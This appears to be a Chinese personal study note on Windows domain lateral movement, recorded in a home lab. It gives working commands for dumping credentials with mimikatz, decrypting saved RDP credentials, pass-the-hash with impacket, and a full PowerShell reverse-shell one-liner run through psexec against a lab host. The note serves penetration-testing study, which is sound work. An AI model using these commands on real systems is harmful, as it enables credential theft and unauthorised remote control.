🗒️横向移动
2023-11-16
| 2023-12-21
字数 698阅读时长 2 分钟
type
status
date
slug
summary
tags
category
icon
password
💡
横向移动:一般指在有一台内网服务器权限的情况下获取其他内网shell的过程
kerveros认证单词解释:#例 KDC:密钥分发中心,包含AS和TGS AS:身份认证服务 TGS:票据授予服务 TGT:由身份认证服务授予的票据,默认有效时长10h PTT------(pass-the-ticket)
这些工具都集成在cs中,此处只是初使用,理解一下工具

MIMIKATZ猕猴桃(针对windows)

(域)读取密码:方法1(受害机器上):

上传mimikatz.exe至服务器
使用以下命令得到密码(明文密码低版本才能成功),更多时候得不到:
mimikatz.exe
privilege::debug 提升权限
sekurlsa::logonpasswords 导出密码信息
notion image

(域)读取密码:方法2(随意一台机器上):

通过转存受害者服务器的lsass进程在本地进行密码获取 任务管理器----进程-----lsass.exe------右键转存
notion image
使用以下命令读取dmp文件的内容:
privilege::debug #权限提升 sekurlsa::minidump lsass.dmp #选择转存文件(建议将lsass.dmp文件放于猕猴桃同一目录) sekurlsa::logonpasswords #导出密码信息,在靶机上直接获取

导出rdp连接信息

C:\Users\用户名\AppData\Local\Microsoft\Credentials\
这个文件夹下存在windows的rdp连接凭据,假如其中一个名为名为:2C4AE716B33E66755F96BB41C2CF2D67
 
使用以下命令:
privilege::debug#权限提升
dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\2C4AE716B33E66755F96BB41C2CF2D67
sekurlsa::dpapi#导出masterkey
 
#通过这个命令查到的guidmasterkey将密码部份解密
dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\2C4AE716B33E66755F96BB41C2CF2D67 /masterkey:2007ac78462779f2754d64efff65668ce9559ec478a40ebce8444e76130e4164af3cdbe92092d24b2cbd0386426fd70b85dabacc2c6a2bdf4fb36559e93142e2 此处没有例子,没有凭据,不做实验了,懂原理了直接cs点点点了。

psexec

域环境:winserver2008(192.168.245.134) win7(192.168.245.138)
域外:kali: 192.168.245.132
互相都可以ping通
 
实验:
建立2008与win7的连接
net use \\ip
输入用户名,密码,建立成功后如图
notion image
通过psexec执行命令
psexec.exe \\192.168.245.138 whoami
notion image
将whoami改为 反弹shell的powershell命令
psexec.exe \\192.168.245.138 powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.245.132',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
notion image
notion image
通过-s可以以系统权限执行命令
psexec.exe \\192.168.245.138 -s whoami
notion image

impacket工具包

一款可以模拟各种协议的工具包
命令1:
python psexec.py 账户:密码@192.168.1.10
notion image
命令2:python smbexec.py 账户:密码@192.168.1.10
notion image
 

无明文密码的连接方法

  1. 爆破:九头蛇,msf,超级弱口令,goby
  1. 使用hash传递
    1. python3 wmiexec.py -hashes lm hash:ntlm hash 域名/用户名@ip
      有机会再详细写,此处给出示例(ntlm可以在猕猴桃命令sekurlsa::logonpasswords看见):
      好像只需要ntlm hash就可以。
      python3 wmiexec.py -hashes :70f36703546aebe88c73fa45c4ecb3b8 qq/administrator@192.168.10.146
       
      python3 wmiexec.py -hashes 00000000000000000000000000000000:70f36703546aebe88c73fa45c4ecb3b8 qq/administrator@192.168.10.146
       
  • 内网相关
  • 内网提权知识学习令牌假冒
    Loading...